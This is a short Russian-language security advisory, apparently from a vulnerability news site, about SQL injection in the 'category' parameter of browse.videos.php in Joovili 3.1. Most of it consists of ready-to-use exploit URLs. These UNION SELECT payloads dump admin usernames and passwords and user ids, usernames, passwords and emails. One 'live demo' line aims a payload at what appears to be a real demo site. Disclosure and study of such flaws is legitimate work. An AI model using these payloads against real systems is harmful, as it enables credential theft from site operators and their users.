Программа: Joovili 3.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «category» сценарием browse.videos.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/* */1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*

http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/* */1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*

L!Ve DeM0:

http://demo.joovili.com/browse.videos.php?category=-1/**/union/**/select/* */1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,6,7,8,9/**/from/**/joovili_admins/*



Оставить мнение